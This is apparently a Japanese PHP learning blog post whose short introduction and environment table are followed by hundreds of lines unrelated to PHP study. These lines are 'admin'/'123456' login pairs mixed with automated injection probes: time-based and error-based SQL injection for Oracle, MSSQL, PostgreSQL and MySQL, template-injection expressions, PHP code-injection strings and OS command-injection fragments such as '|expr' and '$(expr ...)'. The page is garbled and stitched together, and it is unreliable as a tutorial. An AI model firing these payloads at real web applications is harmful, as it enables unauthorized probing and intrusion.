PHPの基礎や構文を学習した際のアウトプットです。今後はフレームワーク、テンプレートエンジンについても学習を進めていく予定です。
PHPはWebアプリケーションを作成する際に威力を発揮する言語なので、覚えておいて損はないですね(・ω・)ノ
記事を作成する際に使用した環境
ホストOS | Windows8.1 |
---|---|
ゲストOS | CentOS7.3 |
Webサーバー | Apatch 2.6 |
VM | VirtualBox-5.1.12-112440-Win |
NetWork | NAT接続&ホストオンリーネットワーク |
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',2)='i
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s
admin
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('q',2)
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('u',0)
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
123456"and"w"="i
admin
123456"and"r"="r
admin
123456'and'i'='d
admin
123456'and's'='s
admin
123456/**/and+2=9
admin
123456/**/and+2=2
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin'"\(
123456
admin
123456
admin
123456
admin
123456
admin鎈'"\(
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
<%- 865357101+980524710 %>
123456
admin
123456
${(955860469+832861457)?c}
123456
admin
123456
admin
123456'"\(
${896374834+913206036}
123456
admin
123456
admin
123456鎈'"\(
/*1*/{{854710020+840147033}}
123456
admin
123456
admin
123456
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1241408992')))>'0
admin
123456
admin
<%- 893243755+976787671 %>
expr 935382976 + 820596652
123456
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1539108613')))
admin
123456
admin
#set($c=884815143+976632841)${c}$c
admin
123456
admin
123456/**/and/**/cast(md5('1467825431')as/**/int)>0
admin
123456
admin
${(941657909+854942289)?c}
'-var_dump(md5(531321461))-'
123456
admin
123456'and(select'1'from/**/cast(md5(1229852991)as/**/int))>'0
admin"and"t"="m
123456
admin
${959840528+812828950}
${@var_dump(md5(757812314))};
123456
admin
extractvalue(1,concat(char(126),md5(1263325204)))
admin"and"p"="p
123456
admin
/*1*/{{833056161+931550771}}
admin
'-var_dump(md5(526645042))-'
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1660317160)))and"
admin'and'w'='c
123456
admin
123456
admin
123456
admin
expr 904966817 + 914019581
admin
${@var_dump(md5(232952768))};
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1414880130)))and'
admin'and'x'='x
123456
${839470119+912033603}
123456
admin
123456
admin
123456
admin
123456&set /A 981838032+821403525
admin
123456
admin
${910926643+926506177}
admin
123456
admin
123456
admin
123456
admin
123456$(expr 835830417 + 828388952)
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456|expr 830313531 + 999053337
admin
123456
admin
123456
admin
123456
admin
123456
expr 972267663 + 839045041
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin"and"d"="m
123456
admin
123456
admin
123456
admin"and"o"="o
123456
admin
123456
admin'and'e'='k
123456
admin
123456
admin'and'o'='o
123456
admin'"\(
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',2)='t
admin鎈'"\(
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('b',2)
admin
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('b',0)
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
123456
admin
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456
admin
123456
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
123456
admin
123456
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
123456'"\(
admin
123456
admin
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456鎈'"\(
admin
123456
expr 821427369 + 951350364
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1800233217')))>'0
admin
123456
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1504936299')))
admin
123456
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456/**/and/**/cast(md5('1385223280')as/**/int)>0
admin
123456
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
123456'and(select'1'from/**/cast(md5(1227036690)as/**/int))>'0
admin
123456
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
extractvalue(1,concat(char(126),md5(1258415898)))
<%- 892992449+855290729 %>
123456
admin
expr 883247415 + 932103555
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1350419152)))and"
admin
123456&set /A 991211728+887977120
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1322371326)))and'
${(837114961+954040812)?c}
123456
admin
123456$(expr 876109743 + 803104724)
admin
123456
admin
123456
${979771451+909390699}
123456
admin
123456|expr 925414798 + 866125760
admin
123456
admin
123456
/*1*/{{864583041+828893173}}
123456
admin
123456
expr 917973083 + 847964080
admin
123456
admin
123456
admin
<%- 834596010+925521060 %>
admin
123456
admin
123456
admin
123456"and"x"="g
admin
123456
admin
#set($c=966357546+949001265)${c}$c
admin
123456
admin
123456
admin
123456"and"u"="u
admin
123456
admin
${(834789475+898622312)?c}
admin
123456
admin
123456
admin
123456'and'p'='o
admin
123456
admin
${850458154+888213721}
admin
123456
admin
123456
admin
123456'and'b'='b
admin
123456
admin
/*1*/{{889654603+916635315}}
admin
123456
admin
123456
admin
123456/**/and+2=6
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456/**/and+2=2
admin
123456
admin
123456
admin
123456
admin
123456
'-var_dump(md5(435316239))-'
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
${@var_dump(md5(556980375))};
123456
admin
123456
admin
123456
${987685083+963561961}
123456
admin
123456
admin
123456
admin
'-var_dump(md5(968248769))-'
admin
123456
admin
123456
admin
${843131107+884051954}
admin
123456
admin
123456
admin
${@var_dump(md5(290610586))};
admin
123456